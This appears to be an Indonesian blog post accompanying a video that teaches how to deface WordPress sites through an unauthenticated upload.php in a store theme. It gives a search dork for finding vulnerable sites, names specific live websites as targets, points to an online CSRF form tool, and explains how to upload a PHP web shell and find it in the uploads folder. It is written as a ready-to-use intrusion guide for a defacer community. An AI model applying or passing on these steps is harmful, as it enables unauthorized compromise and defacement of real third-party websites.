Tutorial Deface With Exploit WordPress Store Shell Upload 2017

[youtube https://www.youtube.com/watch?v=xBeVii3zXPg?rel=0&w=1020&h=600]

Tutorial Deface With Exploit WordPress Store Shell Upload 2017
Pertama pertama dorking dulu dengan
inurl:uploads/products_img
setelah dorking kita CTRL+U di website untkuk cek themes yang dipake
exploitnya
upload/upload.php
jadi kaya gini
http://www.demain-ingenieur.fr/wp-content/themes/demainingenieur/upload/upload.php
tidak vuln webnya :v
live target
www.deybras.com/
http://www.deybras.com/wp-content/themes/Emporium/upload/upload.php
nah ini baru vuln
vuln blank
kita copy alamatnya /url
http://www.deybras.com/wp-content/themes/Emporium/upload/upload.php
setelah copy kita masuk ke csrf online bisa kalian kunjungi dissini
http://myheart.pe.hu/csrfo/
ok langsung saja ke tutorialnya kita copy urlnya
isikan target dengan url yang tadi
postname ini myfile
setelah itu upload shell
suksess blank
letak shell di
http://target.com/wp-content/uploads/products_img/namashell.php
shell udah ke upload sekian tutorial dari saya
jangan kupa subscribe and like
Thanks to all member defacer indonesia :*

GamePlay